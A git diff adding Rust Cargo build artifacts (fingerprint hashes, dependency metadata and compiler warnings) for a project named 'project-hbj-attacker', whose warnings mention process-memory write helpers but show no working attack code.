diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/bin-project-hbj-attacker
new file mode 100644
index 0000000..3534449
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/bin-project-hbj-attacker
@@ -0,0 +1 @@
+625a5db4a71d10a7
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..8a7e0ed
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..7bbaf31
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4a94058ae5fb6c1b/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/dep-lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/dep-lib-project_hbj_attacker
new file mode 100644
index 0000000..024be49
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/dep-lib-project_hbj_attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/lib-project_hbj_attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/lib-project_hbj_attacker
new file mode 100644
index 0000000..0d22c8e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/lib-project_hbj_attacker
@@ -0,0 +1 @@
+a2ac0a79b8ea8e35
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/lib-project_hbj_attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/lib-project_hbj_attacker.json
new file mode 100644
index 0000000..10bdd4e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/lib-project_hbj_attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":1436332732506357817,"profile":17672942494452627365,"path":10763286916239946207,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-4eda4ecb58543ea6/dep-lib-project_hbj_attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..2ae5794
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..1f11887
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/test-bin-project-hbj-attacker
@@ -0,0 +1 @@
+1fd3ff2fdfccea28
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..c9b5a69
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[[3054597201326428407,"iced_x86",false,9862943459092961479],[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[14034831750265444586,"ctor",false,15755893537085299923],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-53852b4f0048cbb7/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/bin-project-hbj-attacker
new file mode 100644
index 0000000..1ee0f7f
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/bin-project-hbj-attacker
@@ -0,0 +1 @@
+cd31bf34fbf89f93
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..4499306
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":17672942494452627365,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021],[17285295483919976612,"dynasmrt",false,3236731772288997544]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/dep-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/dep-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/dep-bin-project-hbj-attacker
new file mode 100644
index 0000000..b217cbf
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/dep-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/output-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/output-bin-project-hbj-attacker
new file mode 100644
index 0000000..457216e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-5a494607dc84530f/output-bin-project-hbj-attacker
@@ -0,0 +1,5 @@
+{"$message_type":"diagnostic","message":"unused import: `processes::write_memory_vm`","code":{"code":"unused_imports","explanation":null},"level":"warning","spans":[{"file_name":"src/helper.rs","byte_start":138,"byte_end":164,"line_start":7,"line_end":7,"column_start":9,"column_end":35,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":9,"highlight_end":35}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_imports)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"remove the whole `use` item","code":null,"level":"help","spans":[{"file_name":"src/helper.rs","byte_start":130,"byte_end":166,"line_start":7,"line_end":8,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":1,"highlight_end":36},{"text":"pub use processes::write_memory_ptrace;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused import: `processes::write_memory_vm`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper.rs:7:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m7\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub use processes::write_memory_vm;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_imports)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:43:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m43\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `sys_write_test` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":203,"byte_end":217,"line_start":14,"line_end":14,"column_start":4,"column_end":18,"is_primary":true,"text":[{"text":"fn sys_write_test()","highlight_start":4,"highlight_end":18}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(dead_code)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `sys_write_test` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:14:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m14\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn sys_write_test()\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(dead_code)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `write_memory_vm` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1757,"byte_end":1772,"line_start":68,"line_end":68,"column_start":8,"column_end":23,"is_primary":true,"text":[{"text":"pub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {","highlight_start":8,"highlight_end":23}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `write_memory_vm` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:68:8\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m68\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"4 warnings emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 4 warnings emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/dep-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/dep-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..c55987e
Binary files /dev/null and b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/dep-test-bin-project-hbj-attacker differ
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/invoked.timestamp b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/invoked.timestamp
new file mode 100644
index 0000000..e00328d
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/invoked.timestamp
@@ -0,0 +1 @@
+This file has an mtime of when this was started.
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/output-test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/output-test-bin-project-hbj-attacker
new file mode 100644
index 0000000..457216e
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/output-test-bin-project-hbj-attacker
@@ -0,0 +1,5 @@
+{"$message_type":"diagnostic","message":"unused import: `processes::write_memory_vm`","code":{"code":"unused_imports","explanation":null},"level":"warning","spans":[{"file_name":"src/helper.rs","byte_start":138,"byte_end":164,"line_start":7,"line_end":7,"column_start":9,"column_end":35,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":9,"highlight_end":35}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_imports)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"remove the whole `use` item","code":null,"level":"help","spans":[{"file_name":"src/helper.rs","byte_start":130,"byte_end":166,"line_start":7,"line_end":8,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"pub use processes::write_memory_vm;","highlight_start":1,"highlight_end":36},{"text":"pub use processes::write_memory_ptrace;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused import: `processes::write_memory_vm`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper.rs:7:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m7\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub use processes::write_memory_vm;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_imports)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"unused variable: `i`","code":{"code":"unused_variables","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(unused_variables)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null},{"message":"if this is intentional, prefix it with an underscore","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":1235,"byte_end":1236,"line_start":43,"line_end":43,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let i = 0;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"_i","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: unused variable: `i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:43:9\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m43\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let i = 0;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33mhelp: if this is intentional, prefix it with an underscore: `_i`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(unused_variables)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `sys_write_test` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/main.rs","byte_start":203,"byte_end":217,"line_start":14,"line_end":14,"column_start":4,"column_end":18,"is_primary":true,"text":[{"text":"fn sys_write_test()","highlight_start":4,"highlight_end":18}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"`#[warn(dead_code)]` on by default","code":null,"level":"note","spans":[],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `sys_write_test` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:14:4\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m14\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mfn sys_write_test()\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mnote\u001b[0m\u001b[0m: `#[warn(dead_code)]` on by default\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"function `write_memory_vm` is never used","code":{"code":"dead_code","explanation":null},"level":"warning","spans":[{"file_name":"src/helper/processes.rs","byte_start":1757,"byte_end":1772,"line_start":68,"line_end":68,"column_start":8,"column_end":23,"is_primary":true,"text":[{"text":"pub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {","highlight_start":8,"highlight_end":23}],"label":null,"suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: function `write_memory_vm` is never used\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:68:8\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m68\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0mpub fn write_memory_vm(pid: Pid, mut start_addr: usize, mut data: &[u8]) -> Result> {\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[33m^^^^^^^^^^^^^^^\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"4 warnings emitted","code":null,"level":"warning","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[33mwarning\u001b[0m\u001b[0m\u001b[1m: 4 warnings emitted\u001b[0m\n\n"}
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/test-bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/test-bin-project-hbj-attacker
new file mode 100644
index 0000000..5982860
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/test-bin-project-hbj-attacker
@@ -0,0 +1 @@
+e9284d78496ce294
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/test-bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/test-bin-project-hbj-attacker.json
new file mode 100644
index 0000000..61c1133
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/test-bin-project-hbj-attacker.json
@@ -0,0 +1 @@
+{"rustc":16285725380928457773,"features":"[]","declared_features":"[]","target":13628841151630406426,"profile":3316208278650011218,"path":4942398508502643691,"deps":[[5150833351789356492,"nix",false,15811409210602710039],[11499138078358568213,"libc",false,1099485397091021021]],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/project-hbj-attacker-6511559cb3af9165/dep-test-bin-project-hbj-attacker","checksum":false}}],"rustflags":[],"config":2069994364910194474,"compile_kind":0}
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/bin-project-hbj-attacker b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/bin-project-hbj-attacker
new file mode 100644
index 0000000..01ee8f3
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/bin-project-hbj-attacker
@@ -0,0 +1 @@
+8614c3f7794f5cce
\ No newline at end of file
diff --git a/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/bin-project-hbj-attacker.json b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/bin-project-hbj-attacker.json
new file mode 100644
index 0000000..22dc147
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/.fingerprint/project-hbj-attacker-8d3f1eaf7577bb99/bin-project-hbj-attacker.json
@@ -0,0 +1 @@
